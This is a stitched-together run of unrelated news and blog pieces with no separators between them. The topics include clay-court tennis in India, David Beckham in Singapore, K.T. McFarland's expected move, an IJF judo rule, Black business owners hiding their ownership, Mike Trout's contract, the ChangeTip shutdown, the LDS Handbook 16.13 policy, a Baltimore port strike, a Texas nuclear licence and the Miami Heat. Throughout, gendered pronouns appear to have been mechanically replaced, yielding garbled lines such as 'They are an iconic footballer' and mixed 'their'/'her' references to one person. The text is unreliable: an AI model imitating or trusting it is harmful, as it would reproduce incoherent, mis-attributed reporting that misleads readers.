Given how cumbersome maintaining clay courts can be, India's former Davis Cup captain Vijay Amritraj believes that a slower hard court should also do the trick.
“I don't think it is essential to start on clay," Amritraj says. “Any slow court will teach kids how to build a point. It is about getting them to play more shots, find more angles, so that they don't pull the trigger too quickly. Sure, clay is the easiest on the body, right from the youngest to the oldest, but for players just starting out it shouldn't be that much of a problem."
While the former players believe that the impact on joints is not as severe for youngsters, it is not a great long-term prospect. “In the long run it surely can't be healthy to play on cement or any hard court," says Ljubicic. “I can't think of another sport that is ‘played' on concrete."
The other edge clay has over hard courts, which both Amritraj and Leander agree on, is the variable bounce that gets players to think on their feet.
“The bounce on clay is very inconsistent," says Leander. “The looseness of the top surface means the ball skids or holds up, and you have to find the right shot. It makes you very adaptable."
India has never had a clay legacy to speak of, but its apathy to the surface is being exposed in the age of attritional tennis. For the country to take rapid strides in world tennis, it needs to find its feet on clay.
SINGAPORE - Sixty children from The Guardian Academy and students from Singapore Association for the Deaf's affiliated schools were given an opportunity to meet footballer David Beckham.
"I have great memories of this city as it was it here that London won the 2012 Olympic bid. Coming back and seeing these kids today has been an inspiration to me. I'm honoured to be invited to the Marina Bay Sands and to launch this community sports initiative. This is a beautiful hotel, and Singapore is one of the most forward looking cities in the world,"said David Beckham.
Widely known for their philanthropic efforts, Beckham also showed their support for the inaugural Sands for Singapore Festival happening on 16-18 August, by signing a jersey that will form the centerpiece of "The Art of Shopping" component to be held at The Shoppes at Marina Bay Sands.
The public will be able to view and bid for the signed jersey during the festival with all proceeds to benefit local charity, Art Outreach.
"It is an honour to have David Beckham here to support our corporate social responsibility initiatives. We hope this is an invaluable experience that these students will take with them into the future," said Mr. George Tanasijevich, President and Chief Executive Officer of Marina Bay Sands.
Eight-year old, Seth Tan, a local football enthusiast and student athlete from The Guardian Academy said, "I'm so excited to meet David Beckham.  They are an iconic footballer who inspires me and shows me that the sky is the limit."
Items donated by luxury retailers from The Shoppes at Marina Bay Sands for "The Art of Shopping" will be encased in "Art Frames" that will sit within shop windows in varying dimensions and will play on the "Art of Window Dressing."
Former National Security Adviser Mike Flynn and Deputy National Security Adviser Kathleen "K.T." McFarland, who is expected to leave their post in about two weeks to possibly serve as ambassador to Singapore, listen to press secretary Sean Spicer during the daily press briefing at the White House in Washington, D.C., on February 1. File Photo by Molly Riley/UPI | License Photo
April 10 (UPI) -- Kathleen "K.T." McFarland is expected to leave their position as White House deputy national security adviser and may serve as ambassador to Singapore, administration officials said.
The 65-year-old former Fox News commentator's departure comes as President Donald Trump's replacement for former National Security Adviser Michael Flynn -- Lt. Gen. H. R. McMaster -- exerts their control of the National Security Council, a person familiar with the matter told Bloomberg.
McFarland is expected to remain in the position for about two weeks before Trump submits them as a nominee for the ambassadorship to Singapore, a senior administration official told ABC News.
McFarland was a favorite of Flynn, who was removed for not telling the truth about conversations with Russian ambassador to the United States Sergey Kislyak, and Trump, who liked their appearances on Fox News and developed a personal connection with her, Politico reported.
Last week, through a presidential memorandum, Trump removed chief political strategist, Steve Bannon, from the National Security Council's principals committee and restored top U.S. intelligence officials as permanent members.
The IJF International Judo Federation has just sent an email to all its official schools worldwide with a warning: ranked Judo athletes may not participate in other grappling competitions.
The email comes from the Federation president with the attachment coming from the International Judo Federation.
Ranked Judo athletes such as Travis Stevens (Judo Olympian) or Leonardo Leite (Pan AM Judo Champion) have participated in major BJJ tournaments such as Copa Podio, Worlds or Jiu-Jitsu world expo. This would mean that with this rule, they may no longer do that.
Ther IJF has also developed a circuit of Judo Ne Waza tournaments which basically follow very similar rules as BJJ with a focus on ground fighting. This is the same principle that FILA (International Wresting Federation) did with Grappling and their ‘Gi Grappling' (sic).
Over the years, the rules in sport Judo have been changed again and again. The IJF's rationale for every change they do is to make Judo more spectator friendly therefore easier to market. However, any smart person can easily see that the changes in rules just kept making Judo more and more unfriendly to BJJ and wrestling athletes who join Judo competitions. One of the last changes they did was making it illegal to grab the pants or the legs and warranting an immediate disqualification. This automatically set aside original judo moves like morote-gari (double leg take down), kuchiki daoshi and kibisu gaeshi (ankle pick and cross ankle pick), sukuinage (scooping throw). These were legitimate moves and more importantly, they ARE Judo moves despite what the IJF says.
It seems that the IJF are disturbed by the fact that BJJ athletes and wrestlers perform well and beat some world class Judo athletes.
The IJF is taking Judo to a different direction, not the one that Sensei Jigoro Kano intended it to be.
Every year, Jiu-Jitsu evolves with new innovations in techniques. In Judo, every year there are new rules prohibiting grips, grabs and Judokas can do less and less because of the rules imposed by the IJF.
if you do Judo and BJJ, you shouldn't feel the need to participate in that age old argument on which is better. Judo and BJJ are two sides of the same coin, yin and yang.
Check out this video of Travis Stevens competing at Copa Podio:
In growing their patio-installation company, Duane Draughon erased all clues to the public that he, a black man, owned the business.
That meant no photos of them or their family on their website; giving potential customers the impression the business was part of a franchise and that they were a project manager, not the owner; and recruiting a white insurance company representative to conduct job interviews in assembling their white sales team.
The covert tactics helped them to bill more than $6 million over nine years to a white clientele they perceived as racist, as they often encountered potential customers who slammed doors in their face or refused to allow them in their homes, they said.
"I never said I wasn't the owner. If asked, I would admit it. But I always said I was either the project manager or a designer," they said.
Draughon is among entrepreneurs who feel compelled to conceal the fact that their businesses are black-owned for fear they will lose patronage — either to misperceptions that the products or services are only for blacks, or to racial biases on the part of potential users.
Some entrepreneurs leave their photos out of websites and marketing materials. Others give the impression that their white employees actually own the operations.
Draughon closed their construction business and moved to Naperville to start VizX Design Studios landscaping design firm in 2014.
After about a year, they became comfortable enough to reveal themselves as the owner.
"Other business owners have reached out to me. I am closing deals. But I'm so used to protecting myself, every time I knock on the door, I do have a fear," they said.
He's even put their photo on their company's website and Facebook page.
That's not a move Chicago tech entrepreneur James Parker is ready to make. He's opted to keep their image out of the promotion of their BestDateNight.com, which offers discounted date outings.
"The idea in any tech startup is to grow it, make a lot of money and dump it for more money," they said. "As soon as you say it's black-owned, white people will believe it's only for black people, and black people will look for something wrong with it."
According to a 2014 Nielsen report on African-American buying habits, 55 percent of blacks with household incomes of at least $50,000 said they would buy or support a product if it was sold or supported by a person of color or minority-owned business. Only 20 percent of non-African Americans in the same income bracket felt the same. The report did not specify the answers of the remaining respondents.
Concerned that potential white customers would read a dominant black presence as meaning services and products are solely for black buyers, some founders minimize or eliminate images of other black people in advertisements and marketing, as well.
Parker hires white spokespeople to represent the company for general market audiences.
And although the founding team of Go Dutch Today is a trio of African-American women, only one of five couples featured on the website for the dating and meeting app is black.
That plays out across all of the team's connection businesses to broaden appeal and help attract investors, said CEO Alysia Sargent.
"At the end of the day, we don't want our brand to be black," said Sargent, a former digital account executive at BET. "Obviously, we want black people to utilize it. However, marketing has to be very broad and multicultural.
"It's kind of unfortunate, but if we want to go further and appeal to venture capitalists and angel investors, we can't just be black."
Pepper Miller, president of The Hunter-Miller Group market research and strategic planning firm in Chicago, said they understand some decisions to downplay black ownership.
"It's not about anybody selling out. People are trying to survive. There's a perception that black people can only do black stuff," said Miller, who began focusing on black consumer marketing when they were denied broader work when starting out in the 1980s.
"It ain't pretty, but it's the truth," they said. "It's called racism. As much as we want to feel like we're not dealing with that, we are."
But Joni Jackson, assistant professor of marketing at Chicago State University, sees little advantage to the tactic and said it encourages a perception of inferiority among black-owned businesses.
"I understand startup businesses might think this is a way to get some traction. But at what point do you reveal that the company is black-owned-and-operated?" Jackson said, "If you're concerned about negative stereotypes that are triggered by associations with that, who's to say they won't be triggered once someone realizes that it is, in fact, a black-owned company?"
Parker said he'll worry about that later.
"I need people to look at the app, and not the app developer yet," said Parker, who is the former operator of a website that promoted black-owned businesses. "After I've milked the opportunities, then I'll come out as CEO."
Cheryl V. Jackson is a freelance writer.
Twitter @cherylvjackson
This story has been updated.
As Teddy KGB once said, “give that man their money.” That statement very much applies to Mike Trout right now, well, expect for the “man” part since Trout is but 20 years old. But should the man-child get their money? Absolutely.
While the Angels promoted Trout to the majors less than a month ago, the uber-prospect has lived up to their lofty billing and then some. He's hitting .315, giving the team a legit leadoff man for the first time in years with a .382 OBP and six steals and they have shown a surprising amount of power. With a 1.4 fWAR, trailing only Jered Weaver on the team, Trout is probably the team's best player.
What does that mean other than small sample sizes are so much fun? It means that the Angels would be well-advised to act fast and secure Trout and their cost levels.
The idea of signing a rookie to a long-term contract before the end of their first season is hardly new one. The Tampa Bay Rays pretty much set the standard for this tactic with the deal they inked Evan Longoria to. For those who don't know, Longoria signed a contract that guaranteed them $17.5 million for their pre-free agency years with club options for their first three years of free agency eligibility that could push the contract's total value to $47.5 million. That contract is ridiculously team-friendly for a player of Longoria's caliber and, well golly, it sure would be swell if Trout would help the Angels out by signing a similar pact.
While the motivation for Trout to sign such a deal would be setting themselves up for life financially they are old enough to drink, the Angels stand to gain a lot more. While the Halos may not seem like they need cost certainty like the cash-strapped Rays, they actually do. In order to finance their massive off-season spending spree this winter, the Angels heavily backloaded the deals for Albert Pujols and C.J. Wilson as well as the contract extension for Jered Weaver. By the time Trout reaches the potentially expensive final years of arbitration and first year of free agency eligibility, the Angels will already have over $65 million committed to those three players alone. Big TV contract or no, the Angels would surely like to get a major discount on those years of Trout in order to maintain financial flexibility.
Just look at what the deal has done for Tampa. Longoria is one of the best players in baseball and making just $4.5 million in what would be their second year of arbitration when they could've been making nearly three times that much had they not been locked up. That kind of money would cripple the Rays, but it would still hurt the Halos given the current cost structures.
More importantly than all of that is the Angels finding a way to prevent Trout from hitting the open market. As it stands right now, Mike would be a free agent at the age of 26. A player of their caliber hitting the market at such a young age? That could put them in line for… dare I say it, Pujols money, if not more at the rate salaries are growing. While the Angels will hopefully still have the deep pockets to offer Trout a monster deal like that, they'd be a whole lot better off if they just delayed their windfall by a few years.
That, of course, is the hard part.
While the Longoria deal is considered a model for all team's, it is almost a cautionary tale to young budding superstars since Longo has performed so well that they will probably have given away tens of millions of dollars in potential earnings by the time their contract expires. If the Angels are going to get Trout, or more accurately their agent, to entertain the idea of signing a similar extension, they'll have to make it a little less similar. Namely, the Halos need to up the ante. Instead of seeking out the mega-savings the Rays got on Longoria, the Angels should focus more on avoiding Trout breaking the bank in arbitration or free agency.
The luxury the Angels have that small market teams don't have is that they can offer Trout a fair amount of guaranteed money, say maybe $24 million, for their six team control years and not sweat it financially if they somehow don't pan out. They can even afford to make those club options Longoria a little more expensive and possibly even guarantee one or more of them. If the Angels step up and offer Trout a contract that guarantees them at least $30 million for the first six years and as much as $60 million through the first nine, can they or their agent really turn down that kind of long-term stability?
It would be a gamble for the Halos and conservative move by Trout, but one that both sides would be wise to make.
Spam "Bitcoin" tipping service ChangeTip has finally decided to bury the rotting corpse of its company, months after most of it's employees were acquired by AirBNB.
Reddit user Nick_Changetip stated the following in their reddit announcement:
In the spring of 2016, ChangeTip's employees were acqui-hired by Airbnb, where most of us work today. Since then, we've been searching for the best outcome for ChangeTip, and unfortunately the only remaining option is to shut it down. At the end of November 2016, all tipping functionality will be deactivated, and the site will be put into withdrawal-only mode for people to collect their funds. The site will remain up for a number of months to allow users to withdraw their funds, and we will be reaching out to users to notify them. We recommend you close your ChangeTip account. You may withdraw any remaining funds via BTC withdrawal, or you can donate your funds to Charity when you close your account from the settings page.
The move marks an end to the lulz that have graced the pages of Qntra on several occasions. Victoria van Eyk (WOT:nonperson) was unable to be reached for comment on the announcement.
I admit it. I got hooked on Candy Crush Saga, just like everyone else (judging by the smartphones I see on the New York subway). And yes, when I've been stuck for a while, on occasion I will shell out a dollar to get some help and move on to the next level already. I don't feel good about it. I know I'm buying into a scheme of manipulative game design and thereby contributing to the degradation of society and culture. However, you must also consider that the candies are colorful, and they make sparkles when I win.
I feel somewhat less guilty after coming across a report on Reddit of EVE Online players who was duped into a battle where their beautiful, massive $10,000 ship was irrevocably torn to shreds by a vengeful rival faction. If you're not familiar with EVE Online, it is the opposite of Candy Crush Saga. It's a huge, elaborate simulation of outer-space trading, warfare, and politics. Unlike Candy Crush, EVE has deep respect for its players, to the extent that players are largely allowed to shape the world themselves. Storylines develop, macrofinancial structures take form, and factions rise and fall, all thanks to movements born within the community. The trade-off for this player-driven intricacy is that the game can be quite intimidating to newcomers.
I've only played EVE long enough to become confused by it, so I'll concede that you're not exactly getting the Sydney Schanberg report here. But from various accounts of the battle, here's what I can piece together. Players in a powerful alliance known as the Pandemic Legion were throwing their weight around by using their powerful ships to pick off lesser beings. They got a little sloppy, though, and ignored their own formidable intelligence network, which could have told them that rivals were planning to lure the Legion into a trap. So the Pandemic Legion players ended up bringing their ultra-rare Revenant Supercarrier into an area where their foes were ready to warp in with a devastating attack fleet. You can see the results above, although it's not the most compelling video, and no, I have no idea what that Chaos Dunk thing is all about. It's more entertaining to hear this Pandemic Legion kingpin lose their shit in the wake of the debacle (while their charges giggle and make fun of him).
Going by the value of the ship as reported in the postmortem breakdown here and the currency converter here, the Revenant Supercarrier was worth about 10,000 bucks, but these numbers are rough. More to the point, your accountant will tell you that pretend spaceships are not the most liquid assets you could hold in your portfolio. At least, I hope your accountant would tell you that. There isn't anybody who's going to buy $10,000 worth of EVE Online currency to purchase one of these ships—even if anyone were willing to sell one. But the fact remains that it took a hell of a lot of work in the EVE markets and battlefields to acquire the Revenant ship, and now it's gone forever, making it the most expensive loss in the decade-long history of the game. Shelling out a couple bucks for that Candy Crush chocolate-bomb pack doesn't seem so silly now, does it? Okay, yes, it still does.
Over the last two weeks, the LDS church has had their new pol­i­cy on LGBT and LGBT chil­dren leaked, pro­vid­ed an expla­na­tion by Christof­fer­son, then final­ly “clar­i­fied” through a state­ment from the first pres­i­den­cy and com­men­tary from Church Pub­lic Affairs.
The church stat­ed that the “ques­tions” regard­ing the pol­i­cy change was caused by “incom­plete news reports, tweets and Face­book posts with­out nec­es­sary con­text and accu­rate infor­ma­tion” that the church was appar­ent­ly going to give to lead­ers. This so-called clar­i­fi­ca­tion was any­thing but. It was a mod­i­fi­ca­tion and back­track, in order to appease the large back­lash from active and inac­tive church mem­bers.
Handbook 1, Section 16.13 policy as released
Let's look at the Hand­book 1, Sec­tion 16.13 lan­guage regard­ing chil­dren of gays to see why.
A nat­ur­al or adopt­ed child of a par­ent liv­ing in a same-gen­der rela­tion­ship, whether the cou­ple is mar­ried or cohab­it­ing, may not receive a name and a bless­ing. A nat­ur­al or adopt­ed child of a par­ent liv­ing in a same-gen­der rela­tion­ship, whether the cou­ple is mar­ried or cohab­it­ing, may be bap­tized and con­firmed, ordained, or rec­om­mend­ed for mis­sion­ary ser­vice only as fol­lows: A mis­sion pres­i­dent or a stake pres­i­dent may request approval from the Office of the First Pres­i­den­cy to bap­tize and con­firm, ordain, or rec­om­mend mis­sion­ary ser­vice for a child of a par­ent who has lived or is liv­ing in a same-gen­der rela­tion­ship when they are sat­is­fied by per­son­al inter­views that both of the fol­low­ing require­ments are met: 1. The child accepts and is com­mit­ted to live the teach­ings and doc­trine of the Church, and specif­i­cal­ly dis­avows the prac­tice of same-gen­der cohab­i­ta­tion and mar­riage. 2. The child is of legal age and does not live with a par­ent who has lived or cur­rent­ly lives in a same-gen­der cohab­i­ta­tion rela­tion­ship or mar­riage.
Now to review the “clar­i­fi­ca­tion” released on Novem­ber 13, 2015
The pro­vi­sions of Hand­book 1, Sec­tion 16.13, that restrict priest­hood ordi­nances for minors, apply only to those chil­dren whose pri­ma­ry res­i­dence is with a cou­ple liv­ing in a same-gen­der mar­riage or sim­i­lar rela­tion­ship.
[…]
chil­dren who already have been bap­tized and are are active in the church but are liv­ing with same-gen­der cou­ples can con­tin­ue to receive priest­hood ordi­nances.
The clar­i­fi­ca­tion states that 16.13 only applies to “chil­dren whose pri­ma­ry res­i­dence is with” the par­ent in a same-sex mar­riage. Also, any cur­rent­ly active child is com­plete­ly exclud­ed from this pol­i­cy change, essen­tial­ly “grand­fa­thered” into a ver­sion of Hand­book 1 with­out sec­tion 16.13.
Evidence the Policy Clarification was a Post Hoc Modification
So why isn't the church's clar­i­fi­ca­tion just that – adding con­text to the released pol­i­cy? Because the hand­book pol­i­cy, as released, lacks crit­i­cal cri­te­ria and con­tains super­flu­ous lan­guage in light of the clar­i­fi­ca­tion. One impor­tant sen­tence shows how:
A nat­ur­al or adopt­ed child {miss­ing cri­te­ria} of a par­ent liv­ing in a same-gen­der rela­tion­ship […] may be bap­tized and con­firmed, ordained, or rec­om­mend­ed for mis­sion­ary ser­vice only as fol­lows:
First, the clar­i­fi­ca­tion adds in the qual­i­fi­ca­tion for the child to have “pri­ma­ry res­i­dence” with the par­ent. This sort of qual­i­fi­ca­tion needs to be in the hand­book in order to be enforce­able long-term. There is no hand­book for the Hand­book. The Hand­book lan­guage has only one qual­i­fi­ca­tion regard­ing res­i­dence sta­tus, and it applies to the par­ent. No such cri­te­ria applies to the child. Adding a con­di­tion is much more than just pro­vid­ing con­text.
Sec­ond, the clar­i­fi­ca­tion waives sec­tion 16.13 for already bap­tized mem­bers. As far as I am aware, “grand­fa­ther­ing” is essen­tial­ly unheard of for church pol­i­cy changes. Did they grand­fa­ther in the active mem­bers cur­rent­ly liv­ing in a same-sex rela­tion­ship from the apos­ta­sy pol­i­cy change? No. Here is where the rub­ber meets the road: had this been their ini­tial inten­tion, there would have been no real need to include any ordi­nance beyond bap­tism in the pol­i­cy. The phrase “and con­firmed, ordained, or rec­om­mend­ed for mis­sion­ary ser­vice” is unnec­es­sary if the pol­i­cy is only sup­posed to apply to already bap­tized mem­bers. This “clar­i­fi­ca­tion” is only clar­i­fy­ing in that it shows the church is reflex­ive­ly soft­en­ing their posi­tion after real­iz­ing just how many peo­ple were affect­ed by the orig­i­nal lan­guage. There are a full 18 years of chil­dren that are poten­tial­ly impact­ed by the orig­i­nal pol­i­cy, while the parts they didn't change, like the baby nam­ing and bless­ing, only impacts rough­ly a month or two of new­borns at this moment.
In order to bet­ter illus­trate the point, let's look at a few alter­na­tive word­ings for this Sec­tion 16.13.
1. How the policy would have been written to not need clarifications
So, had the church always been plan­ning the con­text and clar­i­fi­ca­tion as they claim, what should the pol­i­cy have looked like? There are many ways they could have approached it; I've includ­ed one below. Uncor­re­lat­ed Mormon's blog has an alter­na­tive approach to the same end. This is what the pol­i­cy should new be changed to in the Hand­book, in order to actu­al­ly enforce the pol­i­cy as mod­i­fied:
A nat­ur­al or adopt­ed child of a par­ent liv­ing in a same-gen­der rela­tion­ship, whether the cou­ple is mar­ried or cohab­it­ing, may not receive a name and a bless­ing. A nat­ur­al or adopt­ed child of a par­ent liv­ing in a same-gen­der rela­tion­ship, whether the cou­ple is mar­ried or cohab­it­ing, may be bap­tized and con­firmed, ordained, or rec­om­mend­ed for mis­sion­ary ser­vice only as fol­lows: • The child is already bap­tized and wish­es to be ordained or rec­om­mend­ed for mis­sion­ary ser­vice;
• The child's pri­ma­ry res­i­dence is not with the par­ent liv­ing in a same-gen­der rela­tion­ship; OR
• A mis­sion pres­i­dent or a stake pres­i­dent may request approval from the Office of the First Pres­i­den­cy to bap­tize and con­firm, ordain, or rec­om­mend mis­sion­ary ser­vice for a child of a par­ent who has lived or is liv­ing in a same-gen­der rela­tion­ship when they are sat­is­fied by per­son­al inter­views that both of the fol­low­ing require­ments are met: 1. The child accepts and is com­mit­ted to live the teach­ings and doc­trine of the Church, and specif­i­cal­ly dis­avows the prac­tice of same-gen­der cohab­i­ta­tion and mar­riage. 2. The child is of legal age and does not live with a par­ent who has lived or cur­rent­ly lives in a same-gen­der cohab­i­ta­tion rela­tion­ship or mar­riage.
2. What the policy could have been while still protecting the church
As explained in Mor­mon Sto­ries Episode 587, there is a poten­tial tort lia­bil­i­ty the church may be try­ing to avoid with this pol­i­cy change. Please lis­ten to that episode if you are interested in bet­ter under­stand­ing this con­cern. Essen­tial­ly, bap­tiz­ing the church may cre­ate a “spe­cial rela­tion­ship” between the church and the chil­dren, which could be a basis to sue the church direct­ly or one of the oth­er orga­ni­za­tions of the cor­po­ra­tion which is the church. One exam­ple giv­en is if the active par­ent uti­lizes the church's teach­ings in order to alien­ate the child from the gay par­ent, and I'm sure there are oth­er poten­tial sit­u­a­tions.
Giv­en their desire to avoid such a lia­bil­i­ty, I pro­pose my non-lawyer­ly rec­om­men­da­tion for what could have mit­i­gat­ed that lia­bil­i­ty, with­out being quite so archa­ic and big­ot­ed:
A nat­ur­al or adopt­ed child of a par­ent liv­ing in a same-gen­der rela­tion­ship, whether the cou­ple is mar­ried or cohab­it­ing, may not receive a name and a bless­ing with­out writ­ten approval of each par­ent with cus­tody rights. A nat­ur­al or adopt­ed minor child of a par­ent liv­ing in a same-gen­der rela­tion­ship, whether the cou­ple is mar­ried or cohab­it­ing, may be bap­tized and con­firmed, ordained, or rec­om­mend­ed for mis­sion­ary ser­vice only if each par­ent with cus­tody rights main­tains a writ­ten approval of the child's full church par­tic­i­pa­tion. Such approval is allowed to be with­drawn by the par­ent at any time. as fol­lows: A mis­sion pres­i­dent […]
Under this approach, both par­ents must con­tin­ue to be in favor of the child's par­tic­i­pa­tion. I believe this would indem­ni­fy the cor­po­ra­tion of the church to a large degree, while not pun­ish­ing those fam­i­lies where church atten­dance is still encour­aged or at least per­mit­ted.
3. What the policy would be if the purpose was to protect the children
In Elder Christofferson's inter­view, the First Pres­i­den­cy let­ter, and the Church Pub­lic Affairs com­men­tary, the same point was made: “Our con­cern with respect to chil­dren is their cur­rent and future well-being and the har­mo­ny of their home envi­ron­ment,” and “Church lead­ers want to avoid putting lit­tle chil­dren in a poten­tial tug-of-war between same-sex cou­ples at home and teach­ings and activ­i­ties at church.” How­ev­er truth­ful or noble those con­cerns may be, the Sec­tion 16.13 real­ly does noth­ing direct­ly to pro­tect chil­dren in that way.
For­bid­ding a nam­ing and bless­ing, bap­tism, con­fir­ma­tion, ordi­na­tion, or mis­sion rec­om­men­da­tion has noth­ing to do with stop­ping a tug-of-war between home life and church teach­ings. The things being pro­hib­it­ed are all rit­u­als of the church. Any child attend­ing but not par­tic­i­pat­ing in the rit­u­als is still hear­ing every sin­gle teach­ing of the church. To reit­er­ate one more time: the church's anti-gay teach­ings have no rela­tion to the pro­hib­it­ed rit­u­als.
If the church is actu­al­ly going to pro­tect the chil­dren from the church's teach­ings, I rec­om­mend they adopt the fol­low­ing pol­i­cy “clar­i­fi­ca­tions”:
A nat­ur­al or adopt­ed minor child of a par­ent who has lived or is liv­ing in a same-gen­der rela­tion­ship, whether the cou­ple is mar­ried or cohab­it­ing, may not attend church. receive a name and a bless­ing. A nat­ur­al or adopt­ed child of a par­ent liv­ing […]
Short and sweet, right? Alter­na­tive­ly, the church could also rec­om­mend the par­ent in a same-gen­der rela­tion­ship be giv­en full cus­tody so that the child is not sub­ject to church teach­ing at home, dur­ing church activ­i­ties such as home teach­ing, vis­it­ing teach­ing, fam­i­ly home evening, etc. I don't see them tak­ing this approach, even though it is the only solu­tion to achieve their stat­ed goal.
4. What the policy should be
Final­ly, I want to end with what the pol­i­cy should be, in my per­spec­tive. The first of my two rec­om­men­da­tions is to just remove Sec­tion 16.13 com­plete­ly. Alter­na­tive­ly:
In accor­dance with Arti­cle of Faith 2, a nat­ur­al or adopt­ed child of a par­ent liv­ing in a same-gen­der rela­tion­ship, whether the cou­ple is mar­ried or cohab­it­ing, should be treat­ed equal­ly in every way. Ward or Branch lead­er­ship should check any mis­treat­ment or bul­ly-type behav­ior that may occur due to the church's strong posi­tion against same-gen­der rela­tion­ships. may not receive a name […]
5. Other alternatives?
Do you agree with my revi­sions?
Are there any oth­er “clar­i­fi­ca­tions” you would rec­om­mend the church adopt?
Let me know in the com­ments!
(Reuters) - Cargo operations at the Port of Baltimore, one of the largest and busiest ports in the United States, were halted on Wednesday by a longshoremen's strike after contract negotiations stalled, port officials said.
“There is no cargo being handled or ships being worked at the public marine terminals at the port of Baltimore,” said Richard Scher, a spokesperson for the Maryland Port Administration. “The port of Baltimore, regrettably, is the only port from Maine to Texas that is not working today.”
The strike by the International Longshoremen's Association Local 333 began Wednesday morning with groups of strikers gathering at port entrances carrying signs that read, “No contract, no work,” according to local media reports.
Contract negotiations with the Steamship Trade Association of Baltimore, which represents management, stalled Tuesday night, Scher said.
Union officials could not be reached for comment. The Baltimore Sun quoted striking longshoremen as saying their differences with management were too numerous to list.
“We're dealing with tons and tons of weight, and you can die in an instant,” longshoreman Omahie Mitchell, 33, told the newspaper. “We're tired of being violated.”
Scher said dockworkers at the port - about 2,000 of the port's 14,000 employees - are members of the International Longshoremen's Association and are divided into four local chapters. Only Local 333 is striking, they said, but the other three chapters are supporting them by declining to cross their picket lines.
“Obviously, they're very important to not only this port but to all ports,” Scher said, adding that the port administration “does not have a seat at the table” in the negotiations.
“We are strongly encouraging both sides to reach an agreement,” they said.
Five cargo ships are currently docked and “on standby” at the port, one of Maryland's largest economic generators, Scher said.
The port ranks ninth among the nation's 360 ports in terms of the dollar value of the cargo handled there, and ranks 11th in the weight of cargo handled, Scher said.
Once upon a time in the Fall of 2007 the excitement in south Texas was uncontainable over the “first mover” license application by NRG for two new 1300 MW ABWR nuclear reactors. It was the opening bell, so to speak, in the nuclear renaissance which would eventually encompass over two dozen similar applications from US nuclear utilities to the NRC for combined construction and operating licenses.
But times change, and with the rapid drop in the price of natural gas, the so-called renaissance evaporated like morning fog in the hot Texas sun.
Yet, the South Texas Project effort, with a few organizational changes, has prevailed and made progress towards the license first applied for now over eight years ago. The NRC has completed its Final Safety Evaluation Report for the Combined License (COL) for the proposed South Texas Project (STP) Units 3 & 4.
The report is a major milestone in the road towards actually building the units assuming financing becomes available. The NRC SER concludes there are no safety aspects that would stand in the way of the NRC issuing licenses for construction and operation of the two new reactors at a site near Bay City, Texas.
The next step in the process is a mandatory hearing expected to take place later this year. The purpose of the hearing is to determine whether the staff review supports the findings necessary to issue the licenses. The commission will vote, following the hearing, on whether to authorize the staff to issue the licenses.
The lead applicant is Nuclear Innovation North America, LLC, (NINA) which was founded in 2008 and is based in New York, New York. It is a subsidiary of NRG Energy, Inc. (NRG:NYSE)
The NRC certified the 1300 MW ABWR design in 1997. Toshiba owns a 10% stake in the project. In April 2014 the NRC ruled that this ownership did not violate the the foreign ownership restrictions of the Atomic Energy Act.
The fact that the licenses are likely to be issued does not mean the company will break ground immediately. When NRG first started the project, it ran into stiff resistance from Texas municipal electric utilities in terms of getting them to sign on to cover the costs of construction by taking an equity position in the project.
In an April 3, 2015 report in the Houston Chronicle, a company spokesperson said the firm has “shelved” plans to finance the expansion of the STP facility from two units to four.
“The economics of new nuclear just don't permit the construction of those units today,” NRG spokesperson David Knox said.
The newspaper reported that although NRG shelved plans to help fund two additional units at the facility, it hasn't halted the ongoing process of requesting permits for them, since it wants to allow the plant to seek funding from external investors.
Because NINA is privately held as a subsidiary of NRG, it is unlikely any ongoing negotiations for investments in the project would be made public until all the funding necessary to build the reactors is in place.
South Texas Project Units 1 & 2 are PWRs built in 1988 and 1989 respectively. License renewal is underway for both units. The current licenses run out in 2027 and 2028.
# # #
Chris Bosh (left) and Dwyane Wade have plenty of reason to be happy. (Jerome Miron-USA TODAY Sports)
When LeBron James chose to return to the Cleveland Cavaliers in free agency this summer, just about every NBA watcher in the known world wondered how the heck the Miami Heat would cope with the loss of the best basketball player in the world. We should know better by now than to doubt Pat Riley, but even after re-upping Chris Bosh and Dwyane Wade, and importing Luol Deng and Josh McRoberts, Miami still seemed more likely to tumble toward the East's second tier than to stay near the top of the conference.
A funny thing's happened on the way to the middle of the pack, though. While LeBron and their new mates are scuffling and, um, "sharpening," the Heat have hit the ground running, going 5-2 through seven games and boasting the league's fourth most-potent offense, scoring an average of 108.3 points per 100 possessions.
Scroll to continue with content Ad
After spending four years as a third option, Bosh has thrived as Miami's top gun, and the 32-year-old Wade is back to serving as Erik Spoelstra's primary table-setter. The results have been encouraging, and Wade's happy as a clam for a pretty simple reason, according to Joseph Goodman of the Miami Herald:
[Yahoo Sports Fantasy Basketball: Sign up and join a league today!]
For a basketball player such as Wade, one of the game's greatest playmakers of all time, happiness can be boiled down and distilled into a much simpler formula.
“I got the ball in my hands,” Wade said. [...]
“It's my job to put pressure on the defense and try to make plays for the other guys,” Wade said.
“It makes me feel good that the other guys are feeling good about themselves by me drawing two guys, kicking it to them and them hitting shots and getting into that rhythm and flow.”
Story continues
As is the case whenever we take a look under the hood at this stage in the season, it remains to be seen whether the numbers hold up over the course of a full campaign. In the early going, though, Wade certainly has seen more of the ball this year with James out of the picture, and he's been doing plenty with it.
He's averaging about 10 more front-court touches per game this season than last, and hanging onto the ball about a half-minute longer (a 3.9 minutes-per-game average time of possession) than last season (3.4 minutes per game), according to the NBA's SportVU player tracking data. But he's not just pounding the rock. He's driving to the basket more often (8.3 drives per game, tied with LeBron for 14th in the league and up from 6.9 per game last year) and, once they draw the defense's attention with their penetration, looking to dump off more often, too.
Wade's assisting on a whopping 40.5 percent of their teammates' buckets during their time on the floor this season, the sixth-highest share in the NBA (behind only point guards Ricky Rubio, Chris Paul, Rajon Rondo, John Wall and Jeff Teague) and Wade's best such mark since the 2006-07 season. He's ninth in the league in points created by assist per game (16.4), a quantum leap up from 47th last year (10.7).
The impact of Wade's facilitating extends beyond just the impressive number of dimes he's dropping, too. Per SportVU, Wade's third in the league in "free throw assists," or passes leading to a trip to the line where the shooter made at least one freebie (1.3 per game) and 19th in secondary, or "hockey," assists (1.4 per game). It's great that Wade's happy to have the ball in their hands, but we're betting Spoelstra's more excited by how their increased willingness to get it out of them has bolstered Miami's attack.
While Spoelstra has limited their star shooting guard to fewer minutes per game than they did last season, Wade has yet to miss a contest after playing just 54 of Miami's 82 games last year as part of a season-long "maintenance plan" designed to keep their balky knees in good working order for a long postseason run. Whether they can continue producing at this level without needing extended rest figures to be the biggest question facing Miami this season.
Then again, should Wade need a bit more of a breather, the Heat look like they'll be able to rely more heavily on Bosh, who's spent the first two weeks of this season alternately reminding folks what they used to be in Toronto and forcing naysayers to acknowledge what he's become over the past four years.
